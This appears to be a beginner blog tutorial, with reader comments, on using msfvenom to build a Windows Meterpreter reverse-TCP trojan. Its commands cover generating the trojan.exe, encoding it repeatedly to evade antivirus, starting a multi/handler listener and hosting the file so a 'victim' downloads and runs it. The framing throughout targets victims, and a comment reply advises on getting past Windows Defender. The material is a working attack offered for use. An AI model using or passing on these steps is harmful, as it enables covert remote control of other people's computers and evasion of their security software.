MSFvenom replacement of MSFpayload and msfencode Guide for Beginners

MSFvenom replacement of MSFpayload and msfencode image

Hello and welcome on my blog, I am reaching you with latest and knowledgeable post. As you know msfpayload was used to create payloads ( general called trojan /backdoor ) and msfencode was used to encode payloads for avoiding antivirus detection. you can read in my old post Creating Trojan Horse (Encoded)By Using Msfpayload but both of them msfpayload and msfencode have been removed from metasploit framework on june 8th 2015.

So what is now?

Answer is msfvenom

In this article I will cover what is msfvenom, use of msfvenom, generate and encode payload by msfvenom, avoid bad characters by msfvenom, start multi handler server to listen trojan backdoor.

What is msfvenom ?

In simple word “msfvenom is a combination of msfpayload and msfencode. it is used to generate payloads and encode them as well.” Now you don’t have need to run two different commands to create payload and encode it. msfvenom comes default in metasploit, so you don’t need to install extra package in your system for more detail about metasploit and for Tutorial you read my metasploit guide  section.

Metasploit command line intereface msfconsole and GUI Armitage are preinstalled in Kali Linux current version Kali 2016.2 . I will describe the tutorial by using Kali Linux.

Let’s start using MSFvenom

In Kali Linux,  right click on the desktop desktop then click on the open terminal. New terminal window will be open type the following command

#msfvenom -h

How to generate a payload using MSFvenom

To generate a payload there are two switch must be use -p and -f. -p for payload and -f for output file format. You should know first which payload you are going to use. To print the available list of payload use -l

#msfvenom -l payloads

After selecting appropriate payload. Use the following code

#msfvenom -p <payload> -f <file format>

To know more about formats use the following code

#msfvenom –help-formats

#msfvenom -p windows/meterpreter/reverse_tcp -f exe > PATH

Final code would be

#msfvenom -p windows/meterpreter/reverse_tcp -f exe > /root/Desktop/trojan.exe

Before execute final code you should know about payloads options to be used. You can see in the above code payload is for giving connection back to attacker. But it will not send back connection to attacker, reason, in this code options are not specified yet. So you must know about available options for windows/meterpreter/reverse_tcp. Go through the following code

#msfvenom –payload-options -p <payload >

Now the code is

#msfvenom -p windows/meterpreter/reverse_tcp LHOST=[attacker IP] LPORT=[desired port] -f exe > root/Desktop/trojan.exe

#msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -f exe > root/Desktop/trojan.exe

It’s a good news that your payload is ready, you can send this payload to victim machine and when the victim will execute this file he will be hacked. But this payload is well known and most of antivirus are aware about it. Antivirus will detect easily this code and will remove it. So what is next.

You can do the following things;

  1. Avoid  the bad character
  2. Encode the payload
  3. Iterations

How to avoid bad character from the payloads by using msfvenom

As you have seen in the help menu of msfvenom, -b flag to be used to avoid certain bad characters from the payload. Whne the -b switch is used, msfvenom find good encoder to encode the payload and avoid bad character automatically

Msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -b ‘/x00’ -f exe > root/Desktop/trojan.exe

How to encode a payload by msfvenom

When you will use -b flag, payload will be encode automatic with good encoder. But if you still want to use a specific encoder then you can use -e [encoder name] code. You can use only available encoder with msfvenom. So first use the following code to know about available encoder

Msfvenom -l encoder

Your final code will be

#msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -e x86/shikata_ga_nai -f exe > root/Desktop/trojan.exe


The number of times to encode the payload

#msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe > root/Desktop/trojan.exe

Use architecture and platform for payload by msfvenom

-a <x64/x86> to be used for define architecture. and –platform for platform but first check available platform in metasploit.

msfvenom –help-platforms

#msfvenom -a x86 –platform windows -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe > root/Desktop/trojan.exe

Start multihandler server on attacker machine

Trojan will be executed on victim’s machine and it will send a back connection to attacker machine. So attacker must have a listener server on its machine. You can start multi handler server on your attacker machine by following instruction


msf>use exploit/multi/handler

>set payload windows/meterpreter/reverse_tcp

>set LHOST [attacker IP]

>set LPORT 4444


This is very important phase. you have created trojan.exe and started multi/handler server, Next step send to victim machine. I started apache2 web server and moved trojan.exe /var/www/html. and I have forwarded port 80 to my attacker machine on router. and I send link http://AttackerIP/trojan.exe. Victim download trojan and execute it. the session will be created

MODULE 13:- Metasploit Framework

  1. 6 Metasploit Modules – You should know
  2. MSFvenom replacement of MSFpayload and msfencode – Full guide
  3. 6 Techniques to analyze the vulnerability scan report in Metasploit
  4. How to use Metasploit for vulnerability scanning
  5. How to use metasploit pro in Kali Linux
  6. Creating Persistent Backdoor By Metasploit in Kali Linux
  7. Creating Trojan Horse (Encoded)By Using Msfpayload

If Appreciate My Work, You should consider:

6 thoughts on “MSFvenom replacement of MSFpayload and msfencode Guide for Beginners

  1. I tried it but anti virus even windows defender is able to detect the virus. Is there any other way to evade the detection even though there is Quick Heal Total Security?

    1. Hi Mitul,
      Your question is good, but this is well known code, so all Antivirus has its signature and they detect easily. some time encoding is work properly. if you really want to bypass AV, you should write own code or use any paid encoder.

  2. I am getting this error
    handler failed to bind (public ip) :1337
    I am using lhost as my dynamic dns host

Leave a Reply

Your email address will not be published. Required fields are marked *